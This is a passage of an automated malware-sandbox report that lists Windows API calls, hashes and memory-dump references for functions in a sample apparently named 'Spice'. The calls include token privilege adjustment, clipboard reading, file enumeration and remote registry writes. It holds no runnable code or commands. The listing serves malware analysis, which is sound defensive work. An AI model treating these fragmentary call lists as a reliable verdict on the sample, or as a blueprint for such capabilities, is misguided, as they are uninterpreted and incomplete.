                                                                                                                                                                                                                                      • ClientToScreen.USER32(?,?), ref: 00EFD947
                                                                                                                                                                                                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00EFD97B
                                                                                                                                                                                                                                        • Part of subcall function 00E729AB: GetWindowLongW.USER32(?,000000EB), ref: 00E729BC
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00EFDA17
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                                                                                                                                      • String ID: @GUI_DRAGID$F
                                                                                                                                                                                                                                      • API String ID: 3977979337-4164748364
                                                                                                                                                                                                                                      • Opcode ID: e0223c6f1f53cd2408598ea76ac6ed669828d78dd9afda00239bf6891e71153e
                                                                                                                                                                                                                                      • Instruction ID: 19ade4264357fd7a050ed1dc10af0fdaa4ad32dc63045ea59a4005e3a8a454a6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e0223c6f1f53cd2408598ea76ac6ed669828d78dd9afda00239bf6891e71153e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7942BC70209349AFD724DF28CC44BBABFE6FF88314F141619F695A72A0CB719854DB52
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EC9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EC93E3
                                                                                                                                                                                                                                        • Part of subcall function 00EC9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EC9410
                                                                                                                                                                                                                                        • Part of subcall function 00EC9399: GetLastError.KERNEL32 ref: 00EC941D
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00EC8F71
                                                                                                                                                                                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00EC8FC3
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00EC8FD4
                                                                                                                                                                                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00EC8FEB
                                                                                                                                                                                                                                      • GetProcessWindowStation.USER32 ref: 00EC9004
                                                                                                                                                                                                                                      • SetProcessWindowStation.USER32(00000000), ref: 00EC900E
                                                                                                                                                                                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00EC9028
                                                                                                                                                                                                                                        • Part of subcall function 00EC8DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00EC8F27), ref: 00EC8DFE
                                                                                                                                                                                                                                        • Part of subcall function 00EC8DE9: CloseHandle.KERNEL32(?,?,00EC8F27), ref: 00EC8E10
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                                                                                                                                      • String ID: $default$winsta0
                                                                                                                                                                                                                                      • API String ID: 2063423040-1027155976
                                                                                                                                                                                                                                      • Opcode ID: 720231fd7f32cc8bb6b3fc2b58a3a096cf2f3714acf3c1b30e8a7346e9f51107
                                                                                                                                                                                                                                      • Instruction ID: 84235d51c5d7911afa3ac88f5f8fc48c9f795bd93451dae2cd966f92af76aced
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 720231fd7f32cc8bb6b3fc2b58a3a096cf2f3714acf3c1b30e8a7346e9f51107
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB815B7190124DBFDF119FA4CE4AFEE7BB9BF04308F095159F910B2262DB328A169B50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • OpenClipboard.USER32(00F00980), ref: 00EE465C
                                                                                                                                                                                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00EE466A
                                                                                                                                                                                                                                      • GetClipboardData.USER32(0000000D), ref: 00EE4672
                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 00EE467E
                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00EE469A
                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 00EE46A4
                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00EE46B9
                                                                                                                                                                                                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 00EE46C6
                                                                                                                                                                                                                                      • GetClipboardData.USER32(00000001), ref: 00EE46CE
                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00EE46DB
                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00EE470F
                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 00EE481F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3222323430-0
                                                                                                                                                                                                                                      • Opcode ID: b91f4d0c939ac984d3139b81a21c4932be6c2ab75a02463ec50f70f1da523a09
                                                                                                                                                                                                                                      • Instruction ID: 1cfdd2da963dd0785da99f23149929a6a2f81c2fcc4eab8bb2328a820227f527
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b91f4d0c939ac984d3139b81a21c4932be6c2ab75a02463ec50f70f1da523a09
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0051AFB1244289ABD304EF61DC89F6E73E9BF84B10F00552DF54AE22E1DF70D9059B66
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00EDF5F9
                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00EDF60E
                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00EDF625
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00EDF637
                                                                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00EDF651
                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00EDF669
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00EDF674
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00EDF690
                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00EDF6B7
                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00EDF6CE
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00EDF6E0
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(00F2B578), ref: 00EDF6FE
                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EDF708
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00EDF715
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00EDF727
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                                      • String ID: *.*$S
                                                                                                                                                                                                                                      • API String ID: 1803514871-3360721001
                                                                                                                                                                                                                                      • Opcode ID: ecec668af8deaa91f195e9364de05304c377891a3fd4cceb79cd4ea3f863ebef
                                                                                                                                                                                                                                      • Instruction ID: 00e8e806b5b1594e8d347df23b5c1a4bd1ee78a036b47b09705b1c212165fdf2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ecec668af8deaa91f195e9364de05304c377891a3fd4cceb79cd4ea3f863ebef
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7631A27164121DAADB10DFB4EC49AEE77ACEF09325F141167E816E22A0DF30DA45EA60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00EDCDD0
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00EDCE24
                                                                                                                                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EDCE49
                                                                                                                                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EDCE60
                                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00EDCE87
                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00EDCED3
                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00EDCF16
                                                                                                                                                                                                                                        • Part of subcall function 00E81A36: _memmove.LIBCMT ref: 00E81A77
                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00EDCF6A
                                                                                                                                                                                                                                        • Part of subcall function 00E938C8: __woutput_l.LIBCMT ref: 00E93921
                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00EDCFB8
                                                                                                                                                                                                                                        • Part of subcall function 00E938C8: __flsbuf.LIBCMT ref: 00E93943
                                                                                                                                                                                                                                        • Part of subcall function 00E938C8: __flsbuf.LIBCMT ref: 00E9395B
                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00EDD007
                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00EDD056
                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00EDD0A5
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                                                                                                                                                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                                                                                                                                      • API String ID: 3953360268-2428617273
                                                                                                                                                                                                                                      • Opcode ID: 8a4dde14741dafa1ba7fbeab9c1db4126632ab03232a101a3148f66be4e35e2a
                                                                                                                                                                                                                                      • Instruction ID: d3a9336d11490b15db81832fed17580fc3a8dd70d3335c976c2e4f2482294c79
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8a4dde14741dafa1ba7fbeab9c1db4126632ab03232a101a3148f66be4e35e2a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09A13CB1404305ABC714FFA4D985EAFB7ECEF94704F40591AF589E6191EB30EA09CB62
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EF0FB3
                                                                                                                                                                                                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00F00980,00000000,?,00000000,?,?), ref: 00EF1021
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00EF1069
                                                                                                                                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00EF10F2
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00EF1412
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00EF141F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Close$ConnectCreateRegistryValue
                                                                                                                                                                                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                                      • API String ID: 536824911-966354055
                                                                                                                                                                                                                                      • Opcode ID: 634151e674d181a5eba31d49d8b942d4db44d9d604505f8a82567960b75b76c2
                                                                                                                                                                                                                                      • Instruction ID: 020d861f219d2917c15bc532af805f6b272d523bf8c78dadac0d063ec7aab9e2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 634151e674d181a5eba31d49d8b942d4db44d9d604505f8a82567960b75b76c2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67023875200615DFCB24EF25C841E2AB7E5FF89714F04995CFA99AB2A2CB30ED41CB91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00EDF756
                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00EDF76B
                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00EDF782
                                                                                                                                                                                                                                        • Part of subcall function 00ED4875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00ED4890
                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00EDF7B1
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00EDF7BC
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00EDF7D8
                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00EDF7FF
                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00EDF816
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00EDF828
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(00F2B578), ref: 00EDF846
                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EDF850
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00EDF85D
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00EDF86F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                                                      • String ID: *.*$j
                                                                                                                                                                                                                                      • API String ID: 1824444939-4121651432
                                                                                                                                                                                                                                      • Opcode ID: 2630581683d99ad180f4dfc95ea1c3a3e04cb08c6a9ab47ea2de5c7daca7e64e
                                                                                                                                                                                                                                      • Instruction ID: b9bbf3e8a21e76706c7de29fc8d63b84f8648de6e748d5ae8a2036e0d1312043
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2630581683d99ad180f4dfc95ea1c3a3e04cb08c6a9ab47ea2de5c7daca7e64e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5631167550021E6ADF14DBB4EC49AEE73ACEF09325F100167F805B22A0DB30DE46AB61
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EC8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00EC8E3C
                                                                                                                                                                                                                                        • Part of subcall function 00EC8E20: GetLastError.KERNEL32(?,00EC8900,?,?,?), ref: 00EC8E46
                                                                                                                                                                                                                                        • Part of subcall function 00EC8E20: GetProcessHeap.KERNEL32(00000008,?,?,00EC8900,?,?,?), ref: 00EC8E55
                                                                                                                                                                                                                                        • Part of subcall function 00EC8E20: HeapAlloc.KERNEL32(00000000,?,00EC8900,?,?,?), ref: 00EC8E5C
                                                                                                                                                                                                                                        • Part of subcall function 00EC8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00EC8E73
                                                                                                                                                                                                                                        • Part of subcall function 00EC8EBD: GetProcessHeap.KERNEL32(00000008,00EC8916,00000000,00000000,?,00EC8916,?), ref: 00EC8EC9
                                                                                                                                                                                                                                        • Part of subcall function 00EC8EBD: HeapAlloc.KERNEL32(00000000,?,00EC8916,?), ref: 00EC8ED0
                                                                                                                                                                                                                                        • Part of subcall function 00EC8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00EC8916,?), ref: 00EC8EE1
                                                                                                                                                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00EC8931
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00EC8946
                                                                                                                                                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00EC8965
                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00EC8976
                                                                                                                                                                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00EC89B3
                                                                                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00EC89CF
                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00EC89EC
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00EC89FB
                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00EC8A02
                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00EC8A23
                                                                                                                                                                                                                                      • CopySid.ADVAPI32(00000000), ref: 00EC8A2A
                                                                                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00EC8A5B
                                                                                                                                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00EC8A81
                                                                                                                                                                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00EC8A95
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3996160137-0
                                                                                                                                                                                                                                      • Opcode ID: 1045c0abe233d0548b69e9d2b5274f51edb04302d522cdf23a8e1614ab191556
                                                                                                                                                                                                                                      • Instruction ID: 37e5a5170712e6e95aea317541bf97bae3e7f6b2835b0dc1d653ddd3627dd9cf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1045c0abe233d0548b69e9d2b5274f51edb04302d522cdf23a8e1614ab191556
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C614975900209BFDF10DFA5DE45FEEBBB9FF44304F04812AE815A6290DB329A16DB60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EF147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EF040D,?,?), ref: 00EF1491
                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EF0B0C
                                                                                                                                                                                                                                        • Part of subcall function 00E74D37: __itow.LIBCMT ref: 00E74D62
                                                                                                                                                                                                                                        • Part of subcall function 00E74D37: __swprintf.LIBCMT ref: 00E74DAC
                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00EF0BAB
                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00EF0C43
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00EF0E82
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00EF0E8F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1240663315-0
                                                                                                                                                                                                                                      • Opcode ID: b15943e9f7c8c961fe1ab83a7675544ffbbc37ecc0ee8206c20d3b961d0eabd2
                                                                                                                                                                                                                                      • Instruction ID: 00d1394f2b9d3eca15db0e5497f2db9a0a82a0b1323628c9a9056678eac02b94
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b15943e9f7c8c961fe1ab83a7675544ffbbc37ecc0ee8206c20d3b961d0eabd2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 27E16F71204214AFCB14DF24C991E6ABBE9FF89714F04996DF949EB2A2DB30ED01CB51
                                                                                                                                                                                                                                      Uniqueness

